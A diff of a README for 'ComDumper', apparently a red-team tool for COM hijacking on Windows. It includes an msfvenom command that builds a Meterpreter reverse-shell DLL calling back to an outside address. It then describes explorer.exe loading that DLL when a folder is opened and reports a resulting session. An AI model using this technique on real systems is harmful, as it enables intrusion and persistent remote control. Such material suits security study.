Abdelhadi963/ComDumper/README.md

 ```bash
 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.136.138 LHOST=4444 -f dll -o shell.dll
 ```
-adding the dll  `ComDumper` backup it automaticaly so you can recover it later.
+Adding the dll. `ComDumper` backup it automaticaly so you can recover it later.
 ![image](https://github.com/user-attachments/assets/1c6b6196-004f-47da-a8f8-510de25985b7)

 By navigating to a folder containing ZIP files, we can observe that `explorer.exe` loads `shell.dll`.
 ![image](https://github.com/user-attachments/assets/0bf130b5-aa07-48df-bebe-cfe1cedfcedc)

-we have got the shell
+we have got meterpreter session.
 ![image](https://github.com/user-attachments/assets/737e31ff-e43d-44d2-9382-9279409a733d)

-now can recover it back
+now we can recover it back.
 ![image](https://github.com/user-attachments/assets/43240580-fb13-46f9-8f2e-13a241b948fc)

 For `--hkcu` mode, we can enumerate COM objects used by scheduled tasks using the [Get-ScheduledTaskComHandler.ps1]()https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Get-ScheduledTaskComHandler.ps1 script, created by Matt Nelson and Matthew Graeber.
 I will might add a C# class to enumerate scheduled tasks later.